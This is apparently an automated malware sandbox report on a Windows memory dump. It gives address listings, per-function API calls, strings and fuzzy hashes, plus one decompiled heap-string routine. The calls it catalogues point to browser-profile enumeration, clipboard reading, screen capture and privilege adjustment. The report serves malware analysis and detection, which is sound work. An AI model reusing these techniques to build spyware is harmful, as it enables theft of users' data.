0x00c78f97
0x00c78f97
0x00c78f9e
0x00c78fa0
0x00c78fa3
0x00c78fa5
0x00c78fa5
0x00c78fad
0x00c78fb5
0x00c78fbe
0x00c78fc5
0x00c78fc8
0x00c7921d
0x00c7921d
0x00c79224
0x00c7942b
0x00c79445
0x00c79445
0x00c7922a
0x00c79238
0x00c79242
0x00c7924d
0x00c79254
0x00c79296
0x00c792a6
0x00c792a8
0x00c792ad
0x00c792b1
0x00c792b4
0x00c794cd
0x00c794d0
0x00c79568
0x00c7956e
0x00c795af
0x00c795b5
0x00000000
0x00000000
0x00c795bb
0x00c795be
0x00c795c0
0x00c79417
0x00c7941f
0x00c79422
0x00c79425
0x00000000
0x00c79425
0x00c79594
0x00c7959c
0x00c795a2
0x00c795a5
0x00c795a5
0x00c793c2
0x00c793c2
0x00c793c5
0x00000000
0x00000000
0x00c793c7
0x00c793ca
0x00000000
0x00000000
0x00c793cc
0x00c793cc
0x00000000
0x00c793d0
0x00c79570
0x00c79580
0x00c79582
0x00c7958a
0x00c7958a
0x00c79590
0x00c79592
0x00000000
0x00000000
0x00000000
0x00c79592
0x00c794d6
0x00c7931e
0x00000000
0x00c79321
0x00c794dc
0x00c794df
0x00c79544
0x00c79546
0x00c7954e
0x00c79554
0x00c79554
0x00c79557
0x00c7955d
0x00c79461
0x00c79466
0x00c7946c
0x00c7947d
0x00c79481
0x00c79481
0x00000000
0x00c7955d
0x00c794e1
0x00c794e4
0x00c7952e
0x00c79534
0x00c794b1
0x00c794b1
0x00c794b7
0x00000000
0x00000000
0x00c794bd
0x00c794bd
0x00c794bf
0x00000000
0x00000000
0x00c7940b
0x00c7940e
0x00c79414
0x00000000
0x00c79414
0x00c7953a
0x00c79495
0x00c79495
0x00c79497
0x00c794a3
0x00c794a9
0x00c794a9
0x00000000
0x00c79497
0x00c794e6
0x00c794e9
0x00000000
0x00000000
0x00c794ef
0x00c794f5
0x00c794fe
0x00c79504
0x00000000
0x00000000
0x00c79506
0x00c7950c
0x00000000
0x00000000
0x00c79512
0x00c79514
0x00000000
0x00000000
0x00c7951d
0x00c79520
0x00c79526
0x00000000
0x00c79526
0x00c794f7
0x00000000
0x00c794f7
0x00c792ba
0x00c79488
0x00c7948e
0x00000000
0x00000000
0x00c79490
0x00000000
0x00c79490
0x00c792c0
0x00c792c6
0x00c792c9
0x00c793e4
0x00c793e4
0x00c793ea
0x00c793fc
0x00c79402
0x00c79446
0x00c7944c
0x00000000
0x00000000
0x00c7944e
0x00c79450
0x00c79458
0x00c7945e
0x00c7945e
0x00000000
0x00c79450
0x00c79404
0x00c79406
0x00000000
0x00000000
0x00000000
0x00c79408
0x00c793ec
0x00c793ee
0x00000000
0x00000000
0x00000000
0x00c793f4
0x00c792cf
0x00c792d2
0x00c79359
0x00c7935f
0x00c793d7
0x00c793dd
0x00000000
0x00000000
0x00c793df
0x00000000
0x00c793df
0x00c79366
0x00c7936f
0x00c79372
0x00000000
0x00000000
0x00c79378
0x00c79380
0x00c7938b
0x00c79393
0x00c79395
0x00c793a3
0x00c793a7
0x00c793af
0x00c793b4
0x00c793b6
0x00c793b8
0x00c793bd
0x00c793bf
0x00c793bf
0x00c793bd
0x00000000
0x00c793b6
0x00c792d8
0x00c792db
0x00c79328
0x00c7932e
0x00c79348
0x00c7934e
0x00000000
0x00000000
0x00c79336
0x00c7933a
0x00000000
0x00c7933d
0x00c79330
0x00000000
0x00c79330
0x00c792e0
0x00c792e4
0x00c792e6
0x00000000
0x00000000
0x00c792e8
0x00c792ee
0x00000000
0x00000000
0x00c792f4
0x00c792fa
0x00c79301
0x00c7930a
0x00c79313
0x00c79315
0x00c79319
0x00c79319
0x00000000
0x00c792fa
0x00c79256
0x00c7925b
0x00c79268
0x00c79274
0x00c79283
0x00000000
0x00c79283
0x00c78fce
0x00c78fd3
0x00c78fd6
0x00000000
0x00c78fdc
0x00c78fdc
0x00c78fe0
0x00c78fe2
0x00c78fef
0x00c79003
0x00c7900c
0x00c79014
0x00c7901a
0x00c79022
0x00c79030
0x00c79038
0x00c79041
0x00c79043
0x00c79047
0x00c7904d
0x00c7904d
0x00c79041
0x00c79061
0x00c79068
0x00c7906e
0x00c79073
0x00c79075
0x00c79079
0x00c79063
0x00c79063
0x00c79063
0x00c79080
0x00c7908d
0x00c7908f
0x00c79096
0x00c7909e
0x00c790a3
0x00c790ad
0x00c790b4
0x00c790b7
0x00c790b7
0x00c79096
0x00c790c3
0x00c790cf
0x00c790d6
0x00c790d9
0x00c790dc
0x00c790c5
0x00c790c5
0x00c790c5
0x00c790ea
0x00c790f1
0x00c790f5
0x00c79103
0x00c79103
0x00c79109
0x00c79118
0x00c7912f
0x00c79134
0x00c79134
0x00c7913a
0x00000000
0x00c79140
0x00c79140
0x00c7914d
0x00000000
0x00000000
0x00c79153
0x00c7915b
0x00c79165
0x00c79168
0x00c7916e
0x00c7916e
0x00c79179
0x00c79182
0x00c791a8
0x00c791a8
0x00c791ae
0x00c791c7
0x00c791cf
0x00c791d2
0x00c791d7
0x00c791dc
0x00c791e4
0x00c791ec
0x00c791f5
0x00c7920c
0x00c79214
0x00c79216
0x00c79216
0x00000000
0x00c79214
0x00c791fc
0x00c79206
0x00000000
0x00000000
0x00000000
0x00c79184
0x00c79184
0x00c79189
0x00c7919c
0x00000000
0x00000000
0x00c7919e
0x00c791a6
0x00000000
0x00000000
0x00000000
0x00c791a6
0x00c79182
0x00c7913a

APIs

GetAncestor.USER32 ref: 00C78F61

Part of subcall function 00C7BA38: GetWindowLongPtrA.USER32 ref: 00C7BA6C
Part of subcall function 00C7BA38: GetLastActivePopup.USER32 ref: 00C7BA80
Part of subcall function 00C7BA38: GetWindow.USER32 ref: 00C7BA9D
Part of subcall function 00C7BA38: GetWindow.USER32 ref: 00C7BAAB
Part of subcall function 00C7BA38: GetWindowInfo.USER32 ref: 00C7BAC4
Part of subcall function 00C7BA38: GetWindow.USER32 ref: 00C7BAD2
Part of subcall function 00C7BA38: GetWindow.USER32 ref: 00C7BB1B
Part of subcall function 00C7BA38: GetWindow.USER32 ref: 00C7BB2F

Part of subcall function 00C7BF60: GetParent.USER32 ref: 00C7BF74
Part of subcall function 00C7BF60: GetClassNameA.USER32 ref: 00C7BF88
Part of subcall function 00C7BF60: lstrcmpiA.KERNEL32 ref: 00C7BF9A
Part of subcall function 00C7BF60: GetParent.USER32 ref: 00C7BFA7

SendMessageTimeoutA.USER32 ref: 00C79038
PostMessageA.USER32 ref: 00C79103
GetAncestor.USER32 ref: 00C79168
GetWindow.USER32 ref: 00C79179

Part of subcall function 00C7BFC8: GetWindowLongPtrA.USER32 ref: 00C7BFE0
Part of subcall function 00C7BFC8: GetWindowLongPtrA.USER32 ref: 00C7BFF2

GetWindowInfo.USER32 ref: 00C79194
SendMessageTimeoutA.USER32 ref: 00C791EC
PostMessageA.USER32 ref: 00C79242
GetWindowThreadProcessId.USER32 ref: 00C79301
GetSystemMenu.USER32 ref: 00C79366
GetMenuDefaultItem.USER32 ref: 00C79380
GetMenuItemInfoA.USER32 ref: 00C793A7
GetAncestor.USER32 ref: 00C7940E
PostMessageA.USER32 ref: 00C79425
GetAncestor.USER32 ref: 00C79458
GetWindowThreadProcessId.USER32 ref: 00C79466
GetAncestor.USER32 ref: 00C794A3
GetAncestor.USER32 ref: 00C79520
GetAncestor.USER32 ref: 00C7954E
GetAncestor.USER32 ref: 00C7959C

Strings

P, xrefs: 00C7938B
d, xrefs: 00C791DC

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Window$Ancestor$Message$InfoLongMenuPost$ItemParentProcessSendThreadTimeout$ActiveClassDefaultLastNamePopupSystemlstrcmpi
String ID: P$d
API String ID: 2910538575-684372805
Opcode ID: 608e139f5b66411c8089a4f002a398f5403233e2b0cb12ec7e97354b9a55ee70
Instruction ID: 4fdf2959f78eaecad2f3655706b0368fbdfb4e5c80e03586c813f1228f573a87
Opcode Fuzzy Hash: 608e139f5b66411c8089a4f002a398f5403233e2b0cb12ec7e97354b9a55ee70
Instruction Fuzzy Hash: FDE1137130479082EB34AB2299847BE7361F78ABD0F54C125DEAE47BA5DF3DCA468701

Uniqueness

Uniqueness Score: -1.00%

Function 00C7FFA8, Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 136memorystringCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 00C7FFD4
lstrlenW.KERNEL32 ref: 00C7FFDC
HeapAlloc.KERNEL32 ref: 00C7FFF9
lstrcpyW.KERNEL32 ref: 00C80015
lstrcatW.KERNEL32 ref: 00C80025
lstrlenW.KERNEL32 ref: 00C8002E
HeapAlloc.KERNEL32 ref: 00C8004B
HeapFree.KERNEL32 ref: 00C801A0

Strings

, xrefs: 00C80164
., xrefs: 00C800C5

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Heap$Alloclstrlen$Freelstrcatlstrcpymemset
String ID: $.
API String ID: 3601794232-3929174939
Opcode ID: fc49b2b665f4c1a4cec1620135a6585055db25bc90478505097b555100a4afe3
Instruction ID: e8a65cf9390c3a13ca1e86ab2a2014211b1312c4385d0fc782e2a2c5dd567540
Opcode Fuzzy Hash: fc49b2b665f4c1a4cec1620135a6585055db25bc90478505097b555100a4afe3
Instruction Fuzzy Hash: E751CA35304B4087EB60DB26E89476D73A1F788FA8F948221DA5643B64DF7CC54DC708

Uniqueness

Uniqueness Score: -1.00%

Function 00C76554, Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 74stringmemoryfileCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 00C76578
lstrlenW.KERNEL32 ref: 00C76580
HeapAlloc.KERNEL32 ref: 00C76597
lstrcpyW.KERNEL32 ref: 00C765AF
lstrcatW.KERNEL32 ref: 00C765BF
memset.NTDLL ref: 00C765D2
FindFirstFileW.KERNEL32 ref: 00C765DF
lstrlenW.KERNEL32 ref: 00C76606
HeapAlloc.KERNEL32 ref: 00C7661D
lstrcpyW.KERNEL32 ref: 00C76635
lstrcatW.KERNEL32 ref: 00C76643
SetLastError.KERNEL32 ref: 00C76650
FindNextFileW.KERNEL32 ref: 00C7665E
FindClose.KERNEL32 ref: 00C7666B
SetLastError.KERNEL32 ref: 00C76678

Strings

., xrefs: 00C765F9
\Profiles\*, xrefs: 00C765B5
Profiles\, xrefs: 00C7662B

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Find$AllocErrorFileHeapLastlstrcatlstrcpylstrlenmemset$CloseFirstNext
String ID: .$Profiles\$\Profiles\*
API String ID: 1005269558-3249454066
Opcode ID: d1781df1b183ca5802db71715d052934797f7d0922d226036fa6e30c4096039c
Instruction ID: e281ff3591165f777d8ecd5e14f676d65800eec054cb7b5c17140c806070b22d
Opcode Fuzzy Hash: d1781df1b183ca5802db71715d052934797f7d0922d226036fa6e30c4096039c
Instruction Fuzzy Hash: 29313C25304E4192FB24DB26E9587696361F788BA4F84C225DD6E03BA8DF3CC54ECB04

Uniqueness

Uniqueness Score: -1.00%

Function 00C694B0, Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 176windowsynchronizationtimeCOMMON

Download Yara Rule

APIs

Part of subcall function 00C7C050: IsWindow.USER32 ref: 00C7C06A
Part of subcall function 00C7C050: GetAncestor.USER32(?,?,?,00C7C19D), ref: 00C7C093

GetWindowInfo.USER32 ref: 00C694FC
GetParent.USER32 ref: 00C69505

Part of subcall function 00C7BB64: GetParent.USER32 ref: 00C7BCA4

RedrawWindow.USER32 ref: 00C695AE
SendMessageTimeoutA.USER32 ref: 00C695DC
PrintWindow.USER32 ref: 00C695EF
DefWindowProcA.USER32 ref: 00C6960A
WaitForSingleObject.KERNEL32 ref: 00C69616
SetViewportOrgEx.GDI32 ref: 00C6962D
BitBlt.GDI32 ref: 00C69690
ReleaseMutex.KERNEL32 ref: 00C69699
GetClassLongPtrA.USER32 ref: 00C696AC
DefWindowProcA.USER32 ref: 00C696CB
PrintWindow.USER32 ref: 00C696DD
ScreenToClient.USER32 ref: 00C696F6
BitBlt.GDI32 ref: 00C6973C
DefWindowProcA.USER32 ref: 00C69757

Part of subcall function 00C69858: GetWindowInfo.USER32 ref: 00C69881
Part of subcall function 00C69858: SetWindowLongPtrA.USER32 ref: 00C698AC
Part of subcall function 00C69858: SetLayeredWindowAttributes.USER32 ref: 00C698C3

Strings

, xrefs: 00C69712

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Window$Proc$InfoLongParentPrint$AncestorAttributesClassClientLayeredMessageMutexObjectRedrawReleaseScreenSendSingleTimeoutViewportWait
String ID:
API String ID: 3861020745-3916222277
Opcode ID: 90ce38d1bf5d4b19e57f273841950ee4b88714ce944c4fe0e29aed510158e8ee
Instruction ID: 0dab4fe58c43a090f46860f858e85b0b4195ba31b98e080d0d35d9a2a25ee0bd
Opcode Fuzzy Hash: 90ce38d1bf5d4b19e57f273841950ee4b88714ce944c4fe0e29aed510158e8ee
Instruction Fuzzy Hash: 27716B36314A808BEB64DF26E444B9D77A4F788B88F408225EE1A57F58DF38D659CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00C6A9BC, Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 233encryptionCOMMON

Download Yara Rule

APIs

CryptQueryObject.CRYPT32 ref: 00C6AA46
GetLastError.KERNEL32 ref: 00C6AA50
CryptMsgGetParam.CRYPT32 ref: 00C6AA78
CertCloseStore.CRYPT32 ref: 00C6ACAB
CryptMsgClose.CRYPT32 ref: 00C6ACBB

Strings

1.3.6.1.4.1.311.2.1.12, xrefs: 00C6AB46, 00C6AB90, 00C6ABEE

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Crypt$Close$CertErrorLastObjectParamQueryStore
String ID: 1.3.6.1.4.1.311.2.1.12
API String ID: 3517585230-2596186611
Opcode ID: fcc0127373eed84aa2cd52b39438997d717c3cde8f4ae69e345e3180f0d3fcb0
Instruction ID: 537f0f3efd79523cffb29391fca93f0337e9c7ec1b376d5394ab69c07d59753a
Opcode Fuzzy Hash: fcc0127373eed84aa2cd52b39438997d717c3cde8f4ae69e345e3180f0d3fcb0
Instruction Fuzzy Hash: 80918032205B4096EB30DF26E4D0B6E73A5FB88B84F548225DE5E53B14DF39C989DB05

Uniqueness

Uniqueness Score: -1.00%

Function 00C7B11C, Relevance: 26.3, APIs: 11, Strings: 4, Instructions: 68libraryloaderthreadCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 00C7B139
GetProcAddress.KERNEL32 ref: 00C7B149
GetModuleHandleA.KERNEL32 ref: 00C7B159
GetProcAddress.KERNEL32 ref: 00C7B169
GetCurrentThread.KERNEL32 ref: 00C7B178
OpenThreadToken.ADVAPI32 ref: 00C7B18D
GetCurrentProcess.KERNEL32 ref: 00C7B199
OpenProcessToken.ADVAPI32 ref: 00C7B1AA
GetLastError.KERNEL32 ref: 00C7B1F7
CloseHandle.KERNEL32 ref: 00C7B202
GetKeyState.USER32 ref: 00C7B20D

Strings

advapi32.dll, xrefs: 00C7B132, 00C7B14F
LookupPrivilegeValueA, xrefs: 00C7B142
AdjustTokenPrivileges, xrefs: 00C7B162
SeShutdownPrivilege, xrefs: 00C7B1C1

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Handle$AddressCurrentModuleOpenProcProcessThreadToken$CloseErrorLastState
String ID: AdjustTokenPrivileges$LookupPrivilegeValueA$SeShutdownPrivilege$advapi32.dll
API String ID: 537737460-4041583698
Opcode ID: f8d09f21bf47fff0310ce2f28e2844b076f61b662b9509bfd85fa9d1220b4c88
Instruction ID: dd8f6c1517e235ee6374de03768d59b67c1fe31d1c31b8e9f6de7b9bc0f21fad
Opcode Fuzzy Hash: f8d09f21bf47fff0310ce2f28e2844b076f61b662b9509bfd85fa9d1220b4c88
Instruction Fuzzy Hash: 05314B75204B8586FB10DF61F858B9A7760FB84BE0F848325EA9A43A64DF78C94DCB44

Uniqueness

Uniqueness Score: -1.00%

Function 00C83A94, Relevance: 25.6, APIs: 17, Instructions: 149stringclipboardmemoryCOMMON

Download Yara Rule

APIs

GetWindowLongPtrA.USER32 ref: 00C83AC5
SendNotifyMessageA.USER32 ref: 00C83B1C
GetClipboardOwner.USER32 ref: 00C83B32
OpenClipboard.USER32 ref: 00C83B44
GetClipboardData.USER32 ref: 00C83B57
GlobalLock.KERNEL32 ref: 00C83B6C
lstrlenA.KERNEL32 ref: 00C83B90
lstrlenA.KERNEL32 ref: 00C83B9D
HeapAlloc.KERNEL32 ref: 00C83BB1
lstrlenA.KERNEL32 ref: 00C83BE8
lstrlenA.KERNEL32 ref: 00C83C1F
HeapFree.KERNEL32 ref: 00C83C41
GlobalUnlock.KERNEL32 ref: 00C83C4A
CloseClipboard.USER32 ref: 00C83C50
SendNotifyMessageA.USER32 ref: 00C83C71
SetWindowLongPtrA.USER32 ref: 00C83C89
DefWindowProcA.USER32 ref: 00C83C9A

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Clipboardlstrlen$Window$GlobalHeapLongMessageNotifySend$AllocCloseDataFreeLockOpenOwnerProcUnlock
String ID:
API String ID: 768402609-0
Opcode ID: 947b95007c8f6e0e9c46a1cbbcceb14dee5d4bfa3e6e2c1864d490e66d14890e
Instruction ID: 39e50526913a6609383b55abb0a0d57e4bd474ac1a458c1a21b3fdfb5b6b1d53
Opcode Fuzzy Hash: 947b95007c8f6e0e9c46a1cbbcceb14dee5d4bfa3e6e2c1864d490e66d14890e
Instruction Fuzzy Hash: C751A521205BC082FF25AF6699547397751EB85FD8F499624CE2A57B60DF3CC74A830C

Uniqueness

Uniqueness Score: -1.00%

Function 00C7EADC, Relevance: 24.3, APIs: 16, Instructions: 257windowCOMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00C7EB0F
GetDeviceCaps.GDI32 ref: 00C7EB22
GetDeviceCaps.GDI32 ref: 00C7EB3B
GetDeviceCaps.GDI32 ref: 00C7EB4D
CreateCompatibleBitmap.GDI32 ref: 00C7EB70
GetLastError.KERNEL32(?,?,?,?,?,?,00000088,?,?,00C7E34A,?,?,?,00000000,00000000,00C688C0), ref: 00C7EB85
ReleaseDC.USER32 ref: 00C7EE18

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CapsDevice$BitmapCompatibleCreateErrorLastRelease
String ID:
API String ID: 3333975890-0
Opcode ID: 8fc4c0117995995b8a16993d826de7817755479c5791fc66ace8fbbe1dd7df6b
Instruction ID: 36c259e162a7376e626f1417b0bc6d07516d175bb94419b132256af85dbbf7fc
Opcode Fuzzy Hash: 8fc4c0117995995b8a16993d826de7817755479c5791fc66ace8fbbe1dd7df6b
Instruction Fuzzy Hash: 1591057731428187E7388F36E804B2A7BA1F759B88F88C558CE5A87B58DF38D965C704

Uniqueness

Uniqueness Score: -1.00%

Function 00C7FAD4, Relevance: 21.2, APIs: 14, Instructions: 158
memorystringCOMMONCrypto

Download Yara Rule

C-Code - Quality: 16%

			E00C7FAD4(void* __ecx, intOrPtr* __rax, long long __rbx, void* __rcx, void* __rdx, long long __r8, void* __r9) {
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* __r12;
				int _t31;
				intOrPtr _t34;
				intOrPtr _t36;
				void* _t50;
				int _t60;
				intOrPtr* _t63;
				long long _t66;
				intOrPtr _t68;
				unsigned int* _t95;
				void* _t100;
				intOrPtr* _t102;
				intOrPtr* _t103;
				void* _t105;
				void* _t107;
				void* _t108;
				intOrPtr* _t111;
				void* _t119;
				long _t121;
				long _t123;
				long long _t124;
				intOrPtr* _t126;
				void* _t127;
				intOrPtr* _t128;

				_t63 = __rax;
				 *((long long*)(_t107 + 8)) = __rbx;
				 *((long long*)(_t107 + 0x18)) = __r8;
				_push(_t105);
				_push(_t103);
				_push(_t119);
				_t108 = _t107 - 0x40;
				_t124 = __r8;
				_t100 = __rdx;
				_t60 = 0;
				r8d = 0x10000;
				 *((intOrPtr*)(_t108 + 0x98)) = 0;
				r13d = 0;
				HeapAlloc(_t127, _t123, _t121);
				_t128 = __rax;
				if(__rax != 0) {
					__imp__StrTrimW();
					__imp__StrTrimW();
					_t31 = lstrlenW(??);
					 *(_t108 + 0x30) = _t31;
					r12d = _t31;
					 *((intOrPtr*)(_t108 + 0x28)) = lstrlenW(??);
					E00C80764(_t50, __rax, __rcx, __rcx, _t103, _t105, __r8);
					 *((long long*)(_t108 + 0x38)) = _t63;
					_t66 = _t63;
					if(_t63 != 0) {
						E00C652A4();
						_t60 =  ==  ? 1 : 0;
						 *((intOrPtr*)(_t108 + 0x98)) = _t60;
					}
					r9d = 0x10000;
					_t111 = _t128;
					_t34 = E00C7FFA8(_t63, _t66, _t100, _t124, _t111);
					 *((intOrPtr*)(_t108 + 0x20)) = _t34;
					r14d = _t34;
					if(_t34 != 0) {
						L23:
						if(_t66 != 0) {
							if(_t60 != 0) {
								E00C6528C();
							}
							CloseHandle();
						}
						goto L27;
					} else {
						if(_t66 == 0) {
							L27:
							HeapFree();
							_t36 = r14d;
							goto L28;
						}
						E00C803EC(_t63, _t66, _t100);
						_t126 = _t63;
						if(_t63 == 0) {
							L22:
							r14d =  *((intOrPtr*)(_t108 + 0x20));
							goto L23;
						}
						_t68 =  *((intOrPtr*)(_t108 + 0x90));
						do {
							_t102 = _t126;
							_t126 =  *_t126;
							if( *((long long*)(_t102 + 8)) == 0) {
								goto L18;
							}
							_t95 =  *((intOrPtr*)(_t102 + 0x10));
							r8d = r12d;
							r12d = _t105 + 2;
							 *((long long*)(_t108 + 0x28)) = _t95 + (_t111 + 2) * 2;
							r12d = r12d + ( *_t95 >> 1) - r12d;
							if(r13d >= r12d) {
								L15:
								if(_t103 != 0) {
									lstrcpyW();
									r9d = 0x10000;
									E00C801BC(_t68,  *((intOrPtr*)(_t102 + 8)), _t103, _t102, _t103, _t128, _t119);
								}
								L17:
								CloseHandle();
								r12d =  *(_t108 + 0x30);
								goto L18;
							}
							if(_t103 != 0) {
								HeapFree();
							}
							r8d = r12d;
							r13d = r12d;
							HeapAlloc(??, ??, ??);
							_t103 = _t63;
							if(_t63 != 0) {
								lstrcpyW();
								goto L15;
							} else {
								r13d = 0;
								goto L17;
							}
							L18:
							if( *((intOrPtr*)(_t102 + 0x10)) != 0) {
								HeapFree();
							}
							_t111 = _t102;
							HeapFree(??, ??, ??);
						} while (_t126 != 0);
						_t66 =  *((intOrPtr*)(_t108 + 0x38));
						_t60 =  *((intOrPtr*)(_t108 + 0x98));
						goto L22;
					}
				} else {
					_t4 = _t103 + 8; // 0x8
					_t36 = _t4;
					L28:
					return _t36;
				}
			}

0x00c7fad4
0x00c7fad4
0x00c7fad9
0x00c7fade
0x00c7fadf
0x00c7fae1
0x00c7fae9
0x00c7faed
0x00c7faf0
0x00c7faf6
0x00c7fb01
0x00c7fb07
0x00c7fb10
0x00c7fb13
0x00c7fb19
0x00c7fb1f
0x00c7fb33
0x00c7fb43
0x00c7fb4d
0x00c7fb56
0x00c7fb5a
0x00c7fb66
0x00c7fb6a
0x00c7fb6f
0x00c7fb74
0x00c7fb7a
0x00c7fb7f
0x00c7fb8b
0x00c7fb8e
0x00c7fb8e
0x00c7fb95
0x00c7fb9b
0x00c7fba4
0x00c7fba9
0x00c7fbad
0x00c7fbb2
0x00c7fce3
0x00c7fce6
0x00c7fcea
0x00c7fcef
0x00c7fcef
0x00c7fcf7
0x00c7fcf7
0x00000000
0x00c7fbb8
0x00c7fbbb
0x00c7fcfd
0x00c7fd09
0x00c7fd0f
0x00000000
0x00c7fd0f
0x00c7fbc7
0x00c7fbcc
0x00c7fbd2
0x00c7fcde
0x00c7fcde
0x00000000
0x00c7fcde
0x00c7fbd8
0x00c7fbe4
0x00c7fbe4
0x00c7fbe7
0x00c7fbef
0x00000000
0x00000000
0x00c7fbf5
0x00c7fbf9
0x00c7fc0b
0x00c7fc0f
0x00c7fc14
0x00c7fc1a
0x00c7fc69
0x00c7fc6c
0x00c7fc75
0x00c7fc7f
0x00c7fc8b
0x00c7fc8b
0x00c7fc90
0x00c7fc94
0x00c7fc9a
0x00000000
0x00c7fc9a
0x00c7fc1f
0x00c7fc2d
0x00c7fc2d
0x00c7fc3c
0x00c7fc42
0x00c7fc45
0x00c7fc4b
0x00c7fc51
0x00c7fc5e
0x00000000
0x00c7fc53
0x00c7fc53
0x00000000
0x00c7fc53
0x00c7fc9f
0x00c7fca6
0x00c7fcb1
0x00c7fcb1
0x00c7fcbe
0x00c7fcc3
0x00c7fcc9
0x00c7fcd2
0x00c7fcd7
0x00000000
0x00c7fcd7
0x00c7fb21
0x00c7fb21
0x00c7fb21
0x00c7fd12
0x00c7fd29
0x00c7fd29

APIs

HeapAlloc.KERNEL32(00000000,00000000,?,00000000,?,00000000,00000000,00C7688F), ref: 00C7FB13
StrTrimW.SHLWAPI(?,00000000,?,00000000,00000000,00C7688F), ref: 00C7FB33
StrTrimW.SHLWAPI(?,00000000,?,00000000,00000000,00C7688F), ref: 00C7FB43
lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,00C7688F), ref: 00C7FB4D
lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,00C7688F), ref: 00C7FB5D
HeapFree.KERNEL32(?,00000000,?,00000000,00000000,00C7688F), ref: 00C7FC2D
HeapAlloc.KERNEL32(?,00000000,?,00000000,00000000,00C7688F), ref: 00C7FC45
CloseHandle.KERNEL32(?,00000000,?,00000000,00000000,00C7688F), ref: 00C7FC94
HeapFree.KERNEL32(?,00000000,?,00000000,00000000,00C7688F), ref: 00C7FCB1
HeapFree.KERNEL32(?,00000000,?,00000000,00000000,00C7688F), ref: 00C7FCC3

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Heap$Free$AllocTrimlstrlen$CloseHandle
String ID:
API String ID: 3944168048-0
Opcode ID: 409e000f26243f0af7133e79178066b0551e3b14de60c6b035731291dcf1e78f
Instruction ID: 6547e8a2e5090547b215276187c93e55416209bd50e06e009b45843de4583042
